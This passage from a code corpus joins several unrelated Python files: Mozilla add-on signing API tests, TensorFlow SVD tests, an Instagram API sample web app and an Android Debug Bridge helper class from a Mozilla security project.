'https://reputation.example.com/type/ip/127.0.0.1',
content_type='application/json',
status=404,
)
responses.add(
responses.GET,
'https://reputation.example.com/type/email/%s' % self.user.email,
content_type='application/json',
json={'reputation': 45},
)
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@create-webextension',
version='1.0',
)
assert response.status_code == 403
assert json.loads(response.content.decode('utf-8')) == {
'detail': 'The email address used for your account is not '
'allowed for add-on submission.'
}
assert len(responses.calls) == 2
assert Addon.objects.count() == 0
def test_addon_does_not_exist_webextension_with_guid_in_url(self):
guid = '@custom-guid-provided'
# Override the filename self.request() picks, we want that specific
# file but with a custom guid.
filename = self.xpi_filepath('@create-webextension', '1.0')
response = self.request(
'PUT', # PUT, not POST, since we're specifying a guid in the URL.
filename=filename,
guid=guid, # Will end up in the url since we're not passing one.
version='1.0',
)
assert response.status_code == 201
assert response.data['guid'] == '@custom-guid-provided'
addon = Addon.unfiltered.get(guid=response.data['guid'])
assert addon.guid == '@custom-guid-provided'
assert addon.has_author(self.user)
assert addon.status == amo.STATUS_NULL
latest_version = addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
assert latest_version
assert latest_version.channel == amo.RELEASE_CHANNEL_UNLISTED
def test_addon_does_not_exist_webextension_with_invalid_guid_in_url(self):
guid = 'custom-invalid-guid-provided'
# Override the filename self.request() picks, we want that specific
# file but with a custom guid.
filename = self.xpi_filepath('@create-webextension', '1.0')
response = self.request(
'PUT', # PUT, not POST, since we're specifying a guid in the URL.
filename=filename,
guid=guid, # Will end up in the url since we're not passing one.
version='1.0',
)
assert response.status_code == 400
assert response.data['error'] == 'Invalid Add-on ID in URL or package'
assert not Addon.unfiltered.filter(guid=guid).exists()
def test_webextension_reuse_guid(self):
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@create-webextension-with-guid',
version='1.0',
)
guid = response.data['guid']
assert guid == '@webextension-with-guid'
addon = Addon.unfiltered.get(guid=guid)
assert addon.guid == '@webextension-with-guid'
def test_webextension_reuse_guid_but_only_create(self):
# Uploading the same version with the same id fails. People
# have to use the regular `PUT` endpoint for that.
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@create-webextension-with-guid',
version='1.0',
)
assert response.status_code == 201
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@create-webextension-with-guid',
version='1.0',
)
assert response.status_code == 400
assert response.data['error'] == 'Duplicate add-on ID found.'
def test_webextension_optional_version(self):
# Uploading the same version with the same id fails. People
# have to use the regular `PUT` endpoint for that.
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@create-webextension-with-guid-and-version',
version='99.0',
)
assert response.status_code == 201
assert response.data['guid'] == '@create-webextension-with-guid-and-version'
assert response.data['version'] == '99.0'
def test_webextension_resolve_translations(self):
fname = 'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi'
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@notify-link-clicks-i18n',
version='1.0',
filename=fname,
)
assert response.status_code == 201
addon = Addon.unfiltered.get(guid=response.data['guid'])
# Normalized from `en` to `en-US`
assert addon.default_locale == 'en-US'
assert addon.name == 'Notify link clicks i18n'
assert addon.summary == ('Shows a notification when the user clicks on links.')
translation.activate('de')
addon.reload()
assert addon.name == 'Meine Beispielerweiterung'
assert addon.summary == 'Benachrichtigt den Benutzer über Linkklicks'
def test_too_long_guid_not_in_manifest_forbidden(self):
fname = 'src/olympia/files/fixtures/files/webextension_no_id.xpi'
guid = (
'this_guid_is_longer_than_the_limit_of_64_chars_see_bug_1201176_'
'and_should_fail@webextension-guid'
)
response = self.request(
'PUT', url=self.url(guid, '1.0'), version='1.0', filename=fname
)
assert response.status_code == 400
assert response.data == {
'error': (
"Please specify your Add-on ID in the manifest if it's "
'longer than 64 characters.'
)
}
assert not Addon.unfiltered.filter(guid=guid).exists()
def test_too_long_guid_in_manifest_allowed(self):
fname = 'src/olympia/files/fixtures/files/webextension_too_long_guid.xpi'
guid = (
'this_guid_is_longer_than_the_limit_of_64_chars_see_bug_1201176_'
'and_should_fail@webextension-guid'
)
response = self.request(
'PUT', url=self.url(guid, '1.0'), version='1.0', filename=fname
)
assert response.status_code == 201
assert Addon.unfiltered.filter(guid=guid).exists()
class TestTestUploadVersionWebextensionTransactions(
BaseUploadVersionTestMixin, TestCase, TransactionTestCase
):
# Tests to make sure transactions don't prevent
# ActivityLog/UserRestrictionHistory objects to be saved.
def test_activity_log_saved_on_throttling(self):
url = reverse_ns('signing.version')
with freeze_time('2019-04-08 15:16:23.42'):
for x in range(0, 3):
self._add_fake_throttling_action(
view_class=self.view_class,
url=url,
user=self.user,
remote_addr='1.2.3.4',
)
# At this point we should be throttled since we're using the same
# user. (we're still inside the frozen time context).
response = self.request(
'POST',
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': '1.2.3.4',
'HTTP_X_FORWARDED_FOR': f'1.2.3.4, {get_random_ip()}',
},
)
assert response.status_code == 429, response.content
# We should have recorded an ActivityLog.
assert (
ActivityLog.objects.for_user(self.user)
.filter(action=amo.LOG.THROTTLED.id)
.exists()
)
def test_user_restriction_history_saved_on_permission_denied(self):
EmailUserRestriction.objects.create(email_pattern=self.user.email)
url = reverse_ns('signing.version')
response = self.request(
'POST',
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': '1.2.3.4',
'HTTP_X_FORWARDED_FOR': f'1.2.3.4, {get_random_ip()}',
},
)
assert response.status_code == 403, response.content
assert UserRestrictionHistory.objects.filter(user=self.user).exists()
restriction = UserRestrictionHistory.objects.get(user=self.user)
assert restriction.ip_address == '1.2.3.4'
assert restriction.last_login_ip == '1.2.3.4'
assert restriction.get_restriction_display() == 'EmailUserRestriction'
class TestCheckVersion(BaseUploadVersionTestMixin, TestCase):
def test_not_authenticated(self):
# Use self.client.get so that we don't add the authorization header.
response = self.client.get(self.url(self.guid, '12.5'))
assert response.status_code == 401
def test_addon_does_not_exist(self):
response = self.get(self.url('foo', '12.5'))
assert response.status_code == 404
assert response.data['error'] == ('Could not find Add-on with ID "foo".')
def test_user_does_not_own_addon(self):
self.create_version('3.0')
self.user = UserProfile.objects.create(
read_dev_agreement=datetime.now(), email='[email protected]'
)
self.api_key = self.create_api_key(self.user, 'bar')
response = self.get(self.url(self.guid, '3.0'))
assert response.status_code == 403
assert response.data['error'] == 'You do not own this addon.'
def test_admin_can_view(self):
self.create_version('3.0')
self.user = UserProfile.objects.create(
read_dev_agreement=datetime.now(), email='[email protected]'
)
self.make_admin(self.user)
self.api_key = self.create_api_key(self.user, 'bar')
response = self.get(self.url(self.guid, '3.0'))
assert response.status_code == 200
assert 'processed' in response.data
def test_version_does_not_exist(self):
response = self.get(self.url(self.guid, '2.5'))
assert response.status_code == 404
assert response.data['error'] == 'No uploaded file for that addon and version.'
def test_version_exists(self):
self.create_version('3.0')
response = self.get(self.url(self.guid, '3.0'))
assert response.status_code == 200
assert 'processed' in response.data
def test_version_exists_with_pk(self):
# Mock Version.from_upload so the Version won't be created.
with mock.patch('olympia.devhub.utils.Version.from_upload'):
self.create_version('3.0')
upload = FileUpload.objects.latest()
upload.update(created=datetime.today() - timedelta(hours=1))
self.create_version('3.0')
newer_upload = FileUpload.objects.latest()
assert newer_upload != upload
response = self.get(self.url(self.guid, '3.0', upload.uuid.hex))
assert response.status_code == 200
# For backwards-compatibility reasons, we return the uuid as "pk".
assert response.data['pk'] == upload.uuid.hex
assert 'processed' in response.data
def test_version_exists_with_pk_not_owner(self):
orig_user, orig_api_key = self.user, self.api_key
# This will create a version for the add-on with guid @create-version
# using a new user.
self.user = UserProfile.objects.create(
read_dev_agreement=datetime.now(), email='[email protected]'
)
self.api_key = self.create_api_key(self.user, 'bar')
response = self.request('PUT', guid='@create-version', version='1.0')
assert response.status_code == 201
upload = FileUpload.objects.latest()
# Check that the user that created the upload can access it properly.
response = self.get(self.url('@create-version', '1.0', upload.uuid.hex))
assert response.status_code == 200
assert 'processed' in response.data
# This will create a version for the add-on from the fixture with the
# regular fixture user.
self.user, self.api_key = orig_user, orig_api_key
self.create_version('3.0')
# Check that we can't access the FileUpload by uuid even if we pass in
# an add-on and version that we own if we don't own the FileUpload.
response = self.get(self.url(self.guid, '3.0', upload.uuid.hex))
assert response.status_code == 404
assert 'error' in response.data
def test_version_download_url(self):
version_string = '3.0'
qs = File.objects.filter(
version__addon__guid=self.guid, version__version=version_string
)
assert not qs.exists()
self.create_version(version_string)
response = self.get(self.url(self.guid, version_string))
assert response.status_code == 200
file_ = qs.get()
assert response.data['files'][0]['download_url'] == absolutify(
reverse_ns('signing.file', kwargs={'file_id': file_.id})
+ f'/{file_.filename}'
)
def test_file_hash(self):
version_string = '3.0'
qs = File.objects.filter(
version__addon__guid=self.guid, version__version=version_string
)
assert not qs.exists()
self.create_version(version_string)
response = self.get(self.url(self.guid, version_string))
assert response.status_code == 200
file_ = qs.get()
# We're repackaging, so we can't compare the hash to an existing value.
expected_hash = file_.generate_hash(filename=file_.file_path)
assert file_.hash == expected_hash
assert response.data['files'][0]['hash'] == expected_hash
def test_has_failed_upload(self):
addon = Addon.objects.get(guid=self.guid)
FileUpload.objects.create(
addon=addon,
version='3.0',
user=self.user,
source=amo.UPLOAD_SOURCE_SIGNING_API,
ip_address='127.0.0.70',
)
self.create_version('3.0')
response = self.get(self.url(self.guid, '3.0'))
assert response.status_code == 200
assert 'processed' in response.data
def test_not_throttling_get(self):
self.create_version('3.0')
url = self.url(self.guid, '3.0')
with freeze_time('2019-04-08 15:16:23.42'):
for x in range(0, 60):
# With that many actions all throttling classes should prevent
# the user from submitting an addon...
self._add_fake_throttling_action(
view_class=self.view_class,
url=self.url(self.guid, '3.0'),
user=self.user,
remote_addr='1.2.3.4',
)
# ... But it works, because it's just a GET, not a POST/PUT upload.
response = self.get(
url,
client_kwargs={
'REMOTE_ADDR': '1.2.3.4',
'HTTP_X_FORWARDED_FOR': f'1.2.3.4, {get_random_ip()}',
},
)
assert response.status_code == 200
class TestSignedFile(SigningAPITestMixin, TestCase):
def setUp(self):
super().setUp()
self.file_ = self.create_file()
def url(self):
return reverse_ns('signing.file', args=[self.file_.pk])
def create_file(self):
addon = addon_factory(
name='thing',
version_kw={'channel': amo.RELEASE_CHANNEL_UNLISTED},
users=[self.user],
)
return addon.latest_unlisted_version.file
def test_can_download_once_authenticated(self):
response = self.get(self.url())
assert response.status_code == 200
assert response[settings.XSENDFILE_HEADER] == (self.file_.file_path)
def test_cannot_download_without_authentication(self):
response = self.client.get(self.url()) # no auth
assert response.status_code == 401
def test_api_relies_on_version_downloader(self):
with mock.patch('olympia.versions.views.download_file') as df:
df.return_value = Response({})
self.get(self.url())
assert df.called is True
assert df.call_args[0][0].user == self.user
assert df.call_args[0][1] == str(self.file_.pk)
| wagnerand/addons-server | src/olympia/signing/tests/test_views.py | Python | bsd-3-clause | 58,360 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.math_ops.matrix_inverse."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
class SvdOpTest(tf.test.TestCase):
def testWrongDimensions(self):
# The input to batch_svd should be a tensor of at least rank 2.
scalar = tf.constant(1.)
with self.assertRaisesRegexp(ValueError,
"Shape must be at least rank 2 but is rank 0"):
tf.svd(scalar)
vector = tf.constant([1., 2.])
with self.assertRaisesRegexp(ValueError,
"Shape must be at least rank 2 but is rank 1"):
tf.svd(vector)
def _GetSvdOpTest(dtype_, shape_):
is_complex = dtype_ in (np.complex64, np.complex128)
is_single = dtype_ in (np.float32, np.complex64)
def CompareSingularValues(self, x, y):
if is_single:
tol = 5e-5
else:
tol = 1e-14
self.assertAllClose(x, y, atol=(x[0] + y[0]) * tol)
def CompareSingularVectors(self, x, y, rank):
if is_single:
atol = 5e-4
else:
atol = 5e-14
# We only compare the first 'rank' singular vectors since the
# remainder form an arbitrary orthonormal basis for the
# (row- or column-) null space, whose exact value depends on
# implementation details. Notice that since we check that the
# matrices of singular vectors are unitary elsewhere, we do
# implicitly test that the trailing vectors of x and y span the
# same space.
x = x[..., 0:rank]
y = y[..., 0:rank]
# Singular vectors are only unique up to sign (complex phase factor for
# complex matrices), so we normalize the sign first.
sum_of_ratios = np.sum(np.divide(y, x), -2, keepdims=True)
phases = np.divide(sum_of_ratios, np.abs(sum_of_ratios))
x *= phases
self.assertAllClose(x, y, atol=atol)
def CheckApproximation(self, a, u, s, v, full_matrices):
if is_single:
tol = 1e-5
else:
tol = 1e-14
# Tests that a ~= u*diag(s)*transpose(v).
batch_shape = a.shape[:-2]
m = a.shape[-2]
n = a.shape[-1]
diag_s = tf.cast(tf.matrix_diag(s), dtype=dtype_)
if full_matrices:
if m > n:
zeros = tf.zeros(batch_shape + (m - n, n), dtype=dtype_)
diag_s = tf.concat(a.ndim - 2, [diag_s, zeros])
elif n > m:
zeros = tf.zeros(batch_shape + (m, n - m), dtype=dtype_)
diag_s = tf.concat(a.ndim - 1, [diag_s, zeros])
a_recon = tf.batch_matmul(u, diag_s)
a_recon = tf.batch_matmul(a_recon, v, adj_y=True)
self.assertAllClose(a_recon.eval(), a, rtol=tol, atol=tol)
def CheckUnitary(self, x):
# Tests that x[...,:,:]^H * x[...,:,:] is close to the identity.
xx = tf.batch_matmul(x, x, adj_x=True)
identity = tf.matrix_band_part(tf.ones_like(xx), 0, 0)
if is_single:
tol = 1e-5
else:
tol = 1e-14
self.assertAllClose(identity.eval(), xx.eval(), atol=tol)
def Test(self):
np.random.seed(1)
x = np.random.uniform(
low=-1.0, high=1.0, size=np.prod(shape_)).reshape(shape_).astype(dtype_)
if is_complex:
x += 1j * np.random.uniform(
low=-1.0, high=1.0,
size=np.prod(shape_)).reshape(shape_).astype(dtype_)
for compute_uv in False, True:
for full_matrices in False, True:
with self.test_session():
if compute_uv:
tf_s, tf_u, tf_v = tf.svd(tf.constant(x),
compute_uv=compute_uv,
full_matrices=full_matrices)
else:
tf_s = tf.svd(tf.constant(x),
compute_uv=compute_uv,
full_matrices=full_matrices)
if compute_uv:
np_u, np_s, np_v = np.linalg.svd(x,
compute_uv=compute_uv,
full_matrices=full_matrices)
else:
np_s = np.linalg.svd(x,
compute_uv=compute_uv,
full_matrices=full_matrices)
CompareSingularValues(self, np_s, tf_s.eval())
if compute_uv:
CompareSingularVectors(self, np_u, tf_u.eval(), min(shape_[-2:]))
CompareSingularVectors(self, np.conj(np.swapaxes(np_v, -2, -1)),
tf_v.eval(), min(shape_[-2:]))
CheckApproximation(self, x, tf_u, tf_s, tf_v, full_matrices)
CheckUnitary(self, tf_u)
CheckUnitary(self, tf_v)
return Test
if __name__ == "__main__":
for dtype in np.float32, np.float64, np.complex64, np.complex128:
for rows in 1, 2, 5, 10, 32, 100:
for cols in 1, 2, 5, 10, 32, 100:
for batch_dims in [(), (3,)] + [(3, 2)] * (max(rows, cols) < 10):
shape = batch_dims + (rows, cols)
name = "%s_%s" % (dtype.__name__, "_".join(map(str, shape)))
setattr(SvdOpTest, "testSvd_" + name, _GetSvdOpTest(dtype, shape))
tf.test.main()
| nanditav/15712-TensorFlow | tensorflow/python/kernel_tests/svd_op_test.py | Python | apache-2.0 | 5,740 |
import bottle
import beaker.middleware
from bottle import route, redirect, post, run, request, hook
from instagram import client, subscriptions
bottle.debug(True)
session_opts = {
'session.type': 'file',
'session.data_dir': './session/',
'session.auto': True,
}
app = beaker.middleware.SessionMiddleware(bottle.app(), session_opts)
CONFIG = {
'client_id': '<client_id>',
'client_secret': '<client_secret>',
'redirect_uri': 'http://localhost:8515/oauth_callback'
}
unauthenticated_api = client.InstagramAPI(**CONFIG)
@hook('before_request')
def setup_request():
request.session = request.environ['beaker.session']
def process_tag_update(update):
print(update)
reactor = subscriptions.SubscriptionsReactor()
reactor.register_callback(subscriptions.SubscriptionType.TAG, process_tag_update)
@route('/')
def home():
try:
url = unauthenticated_api.get_authorize_url(scope=["likes","comments"])
return '<a href="%s">Connect with Instagram</a>' % url
except Exception as e:
print(e)
def get_nav():
nav_menu = ("<h1>Python Instagram</h1>"
"<ul>"
"<li><a href='/recent'>User Recent Media</a> Calls user_recent_media - Get a list of a user's most recent media</li>"
"<li><a href='/user_media_feed'>User Media Feed</a> Calls user_media_feed - Get the currently authenticated user's media feed uses pagination</li>"
"<li><a href='/location_recent_media'>Location Recent Media</a> Calls location_recent_media - Get a list of recent media at a given location, in this case, the Instagram office</li>"
"<li><a href='/media_search'>Media Search</a> Calls media_search - Get a list of media close to a given latitude and longitude</li>"
"<li><a href='/media_popular'>Popular Media</a> Calls media_popular - Get a list of the overall most popular media items</li>"
"<li><a href='/user_search'>User Search</a> Calls user_search - Search for users on instagram, by name or username</li>"
"<li><a href='/user_follows'>User Follows</a> Get the followers of @instagram uses pagination</li>"
"<li><a href='/location_search'>Location Search</a> Calls location_search - Search for a location by lat/lng</li>"
"<li><a href='/tag_search'>Tags</a> Search for tags, view tag info and get media by tag</li>"
"</ul>")
return nav_menu
@route('/oauth_callback')
def on_callback():
code = request.GET.get("code")
if not code:
return 'Missing code'
try:
access_token, user_info = unauthenticated_api.exchange_code_for_access_token(code)
if not access_token:
return 'Could not get access token'
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
request.session['access_token'] = access_token
except Exception as e:
print(e)
return get_nav()
@route('/recent')
def on_recent():
content = "<h2>User Recent Media</h2>"
access_token = request.session['access_token']
if not access_token:
return 'Missing Access Token'
try:
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
recent_media, next = api.user_recent_media()
photos = []
for media in recent_media:
photos.append('<div style="float:left;">')
if(media.type == 'video'):
photos.append('<video controls width height="150"><source type="video/mp4" src="%s"/></video>' % (media.get_standard_resolution_url()))
else:
photos.append('<img src="%s"/>' % (media.get_low_resolution_url()))
photos.append("<br/> <a href='/media_like/%s'>Like</a> <a href='/media_unlike/%s'>Un-Like</a> LikesCount=%s</div>" % (media.id,media.id,media.like_count))
content += ''.join(photos)
except Exception as e:
print(e)
return "%s %s <br/>Remaining API Calls = %s/%s" % (get_nav(),content,api.x_ratelimit_remaining,api.x_ratelimit)
@route('/media_like/<id>')
def media_like(id):
access_token = request.session['access_token']
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
api.like_media(media_id=id)
redirect("/recent")
@route('/media_unlike/<id>')
def media_unlike(id):
access_token = request.session['access_token']
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
api.unlike_media(media_id=id)
redirect("/recent")
@route('/user_media_feed')
def on_user_media_feed():
access_token = request.session['access_token']
content = "<h2>User Media Feed</h2>"
if not access_token:
return 'Missing Access Token'
try:
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
media_feed, next = api.user_media_feed()
photos = []
for media in media_feed:
photos.append('<img src="%s"/>' % media.get_standard_resolution_url())
counter = 1
while next and counter < 3:
media_feed, next = api.user_media_feed(with_next_url=next)
for media in media_feed:
photos.append('<img src="%s"/>' % media.get_standard_resolution_url())
counter += 1
content += ''.join(photos)
except Exception as e:
print(e)
return "%s %s <br/>Remaining API Calls = %s/%s" % (get_nav(),content,api.x_ratelimit_remaining,api.x_ratelimit)
@route('/location_recent_media')
def location_recent_media():
access_token = request.session['access_token']
content = "<h2>Location Recent Media</h2>"
if not access_token:
return 'Missing Access Token'
try:
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
recent_media, next = api.location_recent_media(location_id=514276)
photos = []
for media in recent_media:
photos.append('<img src="%s"/>' % media.get_standard_resolution_url())
content += ''.join(photos)
except Exception as e:
print(e)
return "%s %s <br/>Remaining API Calls = %s/%s" % (get_nav(),content,api.x_ratelimit_remaining,api.x_ratelimit)
@route('/media_search')
def media_search():
access_token = request.session['access_token']
content = "<h2>Media Search</h2>"
if not access_token:
return 'Missing Access Token'
try:
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
media_search = api.media_search(lat="37.7808851",lng="-122.3948632",distance=1000)
photos = []
for media in media_search:
photos.append('<img src="%s"/>' % media.get_standard_resolution_url())
content += ''.join(photos)
except Exception as e:
print(e)
return "%s %s <br/>Remaining API Calls = %s/%s" % (get_nav(),content,api.x_ratelimit_remaining,api.x_ratelimit)
@route('/media_popular')
def media_popular():
access_token = request.session['access_token']
content = "<h2>Popular Media</h2>"
if not access_token:
return 'Missing Access Token'
try:
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
media_search = api.media_popular()
photos = []
for media in media_search:
photos.append('<img src="%s"/>' % media.get_standard_resolution_url())
content += ''.join(photos)
except Exception as e:
print(e)
return "%s %s <br/>Remaining API Calls = %s/%s" % (get_nav(),content,api.x_ratelimit_remaining,api.x_ratelimit)
@route('/user_search')
def user_search():
access_token = request.session['access_token']
content = "<h2>User Search</h2>"
if not access_token:
return 'Missing Access Token'
try:
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
user_search = api.user_search(q="Instagram")
users = []
for user in user_search:
users.append('<li><img src="%s">%s</li>' % (user.profile_picture,user.username))
content += ''.join(users)
except Exception as e:
print(e)
return "%s %s <br/>Remaining API Calls = %s/%s" % (get_nav(),content,api.x_ratelimit_remaining,api.x_ratelimit)
@route('/user_follows')
def user_follows():
access_token = request.session['access_token']
content = "<h2>User Follows</h2>"
if not access_token:
return 'Missing Access Token'
try:
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
# 25025320 is http://instagram.com/instagram
user_follows, next = api.user_follows('25025320')
users = []
for user in user_follows:
users.append('<li><img src="%s">%s</li>' % (user.profile_picture,user.username))
while next:
user_follows, next = api.user_follows(with_next_url=next)
for user in user_follows:
users.append('<li><img src="%s">%s</li>' % (user.profile_picture,user.username))
content += ''.join(users)
except Exception as e:
print(e)
return "%s %s <br/>Remaining API Calls = %s/%s" % (get_nav(),content,api.x_ratelimit_remaining,api.x_ratelimit)
@route('/location_search')
def location_search():
access_token = request.session['access_token']
content = "<h2>Location Search</h2>"
if not access_token:
return 'Missing Access Token'
try:
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
location_search = api.location_search(lat="37.7808851",lng="-122.3948632",distance=1000)
locations = []
for location in location_search:
locations.append('<li>%s <a href="https://www.google.com/maps/preview/@%s,%s,19z">Map</a> </li>' % (location.name,location.point.latitude,location.point.longitude))
content += ''.join(locations)
except Exception as e:
print(e)
return "%s %s <br/>Remaining API Calls = %s/%s" % (get_nav(),content,api.x_ratelimit_remaining,api.x_ratelimit)
@route('/tag_search')
def tag_search():
access_token = request.session['access_token']
content = "<h2>Tag Search</h2>"
if not access_token:
return 'Missing Access Token'
try:
api = client.InstagramAPI(access_token=access_token, client_secret=CONFIG['client_secret'])
tag_search, next_tag = api.tag_search(q="backclimateaction")
tag_recent_media, next = api.tag_recent_media(tag_name=tag_search[0].name)
photos = []
for tag_media in tag_recent_media:
photos.append('<img src="%s"/>' % tag_media.get_standard_resolution_url())
content += ''.join(photos)
except Exception as e:
print(e)
return "%s %s <br/>Remaining API Calls = %s/%s" % (get_nav(),content,api.x_ratelimit_remaining,api.x_ratelimit)
@route('/realtime_callback')
@post('/realtime_callback')
def on_realtime_callback():
mode = request.GET.get("hub.mode")
challenge = request.GET.get("hub.challenge")
verify_token = request.GET.get("hub.verify_token")
if challenge:
return challenge
else:
x_hub_signature = request.header.get('X-Hub-Signature')
raw_response = request.body.read()
try:
reactor.process(CONFIG['client_secret'], raw_response, x_hub_signature)
except subscriptions.SubscriptionVerifyError:
print("Signature mismatch")
bottle.run(app=app, host='localhost', port=8515, reloader=True)
| ironman5366/python-instagram | sample_app.py | Python | bsd-3-clause | 11,753 |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import subprocess
import time
import os
import re
class AccessDebugBridge(object):
def __init__(self, adbPath="adb", deviceSerial=None, isEmulator=False):
self.adbPath = adbPath
self.deviceSerial = deviceSerial
self.isEmulator = isEmulator
def verifyADB(self):
if self.adbPath != 'adb':
if not os.access(self.adbPath, os.X_OK):
raise Exception("invalid ADB path, or ADB not executable: %s", self.adbPath)
try:
self.checkCmd(["version"])
except os.error as err:
raise Exception(
"unable to execute ADB (%s): ensure Android SDK is installed and ADB is in your $PATH" % err)
except subprocess.CalledProcessError:
raise Exception("unable to execute ADB: ensure Android SDK is installed and ADB is in your $PATH")
def verifyDevice(self):
if self.deviceSerial:
deviceStatus = None
proc = subprocess.Popen([self.adbPath, "devices"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
for line in proc.stdout:
m = re.match('(.+)?\s+(.+)$', line)
if m:
if self.deviceSerial == m.group(1):
deviceStatus = m.group(2)
if deviceStatus is None:
raise Exception("device not found: %s" % self.deviceSerial)
elif deviceStatus != "device":
raise Exception("bad status for device %s: %s" % (self.deviceSerial, deviceStatus))
try:
self.checkCmd(["shell", "echo"])
except subprocess.CalledProcessError:
raise Exception("unable to connect to device: is it plugged in?")
def runCmd(self, args):
finalArgs = [self.adbPath]
if self.deviceSerial:
finalArgs.extend(['-s', self.deviceSerial])
finalArgs.extend(args)
return subprocess.Popen(finalArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def checkCmd(self, args, timeout=None):
finalArgs = [self.adbPath]
if self.deviceSerial:
finalArgs.extend(['-s', self.deviceSerial])
finalArgs.extend(args)
if timeout:
timeout = int(timeout)
proc = subprocess.Popen(finalArgs)
start_time = time.time()
ret_code = proc.poll()
while ((time.time() - start_time) <= timeout) and ret_code is None:
time.sleep(1)
ret_code = proc.poll()
if ret_code is None:
proc.kill()
raise Exception("Timeout exceeded for checkCmd call")
return ret_code
return subprocess.check_call(finalArgs)
def getProcessList(self):
p = self.runCmd(["shell", "ps"])
p.stdout.readline()
proc = p.stdout.readline()
ret = []
while proc:
els = proc.split()
ret.append(list([els[1], els[len(els) - 1], els[0]]))
proc = p.stdout.readline()
return ret
def killProcess(self, appname, forceKill=False):
procs = self.getProcessList()
didKillProcess = False
for (pid, name, user) in procs:
if name == appname:
args = ["shell", "kill"]
if forceKill:
args.append("-9")
args.append(pid)
p = self.runCmd(args)
p.communicate()
if p.returncode == 0:
didKillProcess = True
return didKillProcess
def reboot(self, wait=False):
ret = self.runCmd(["reboot"]).stdout.read()
if not wait:
return ret
return self.checkCmd(["wait-for-device"])
def getCurrentTime(self):
timestr = self.runCmd(["shell", "date", "+%s"]).stdout.read().strip()
if not timestr or not timestr.isdigit():
return None
return str(int(timestr) * 1000)
def getDeviceInformation(self, directive="all"):
ret = {}
if directive == "id" or directive == "all":
ret["id"] = self.runCmd(["get-serialno"]).stdout.read()
if directive == "os" or directive == "all":
ret["os"] = self.runCmd(["shell", "getprop", "ro.build.display.id"]).stdout.read()
if directive == "uptime" or directive == "all":
utime = self.runCmd(["shell", "uptime"]).stdout.read()
if utime:
utime = utime[9:]
hours = utime[0:utime.find(":")]
utime = utime[utime[1:].find(":") + 2:]
minutes = utime[0:utime.find(":")]
utime = utime[utime[1:].find(":") + 2:]
seconds = utime[0:utime.find(",")]
ret["uptime"] = ["0 days " + hours + " hours " + minutes + " minutes " + seconds + " seconds"]
if directive == "process" or directive == "all":
ret["process"] = self.runCmd(["shell", "ps"]).stdout.read()
if directive == "systime" or directive == "all":
ret["systime"] = self.runCmd(["shell", "date"]).stdout.read()
if directive == "version" or directive == "all":
ret["version"] = self.runCmd(["shell", "cat", "/proc/version"]).stdout.read()
if directive == "cpuinfo" or directive == "all":
ret["cpuinfo"] = self.runCmd(["shell", "cat", "/proc/cpuinfo"]).stdout.read()
if directive == "meminfo" or directive == "all":
ret["meminfo"] = self.runCmd(["shell", "cat", "/proc/meminfo"]).stdout.read()
if directive == "procrank" or directive == "all" and not self.isEmulator:
ret["procrank"] = self.runCmd(["shell", "procrank"]).stdout.read()
if directive == "pstree" or directive == "all" and not self.isEmulator:
ret["pstree"] = self.runCmd(["shell", "pstree"]).stdout.read()
if directive == "bugreport" or directive == "all":
ret["bugreport"] = self.runCmd(["shell", "bugreport"]).stdout.read()
return ret
def makeDeviceReport(self):
dev = self.getDeviceInformation()
hr = '\n# ' + '-' * 80 + '\n\n'
txt = ""
if dev.has_key('version'):
txt += dev.get('version')
txt += hr
if dev.has_key('cpuinfo'):
txt += dev.get('cpuinfo')
txt += hr
if dev.has_key('meminfo'):
txt += dev.get('meminfo')
txt += hr
if dev.has_key('procrank'):
txt += dev.get('procrank')
return txt
def makeBugReport(self):
return self.getDeviceInformation("bugreport")
def getPID(self, procName):
if self.isEmulator:
try:
return int(filter(lambda x: x[1] == procName, self.getProcessList())[0][0])
except IndexError:
return -1
else:
return int(self.runCmd(['shell', 'pidof', procName]).stdout.read())
def getPIDs(self, procName):
try:
processes = filter(lambda x: x[1] == procName, self.getProcessList())
return [int(proc[0]) for proc in processes]
except IndexError:
return -1
def shell(self, command):
commandList = ["shell"]
for eachCommand in command:
commandList.append(eachCommand)
return self.command(commandList)
def command(self, command):
commandList = ["adb"]
for eachCommand in command:
commandList.append(eachCommand)
return subprocess.check_output(commandList).strip("\r\n")
| MozillaSecurity/peach | Peach/Utilities/ADB.py | Python | mpl-2.0 | 7,772 |
"""
DOCUMENTATION:
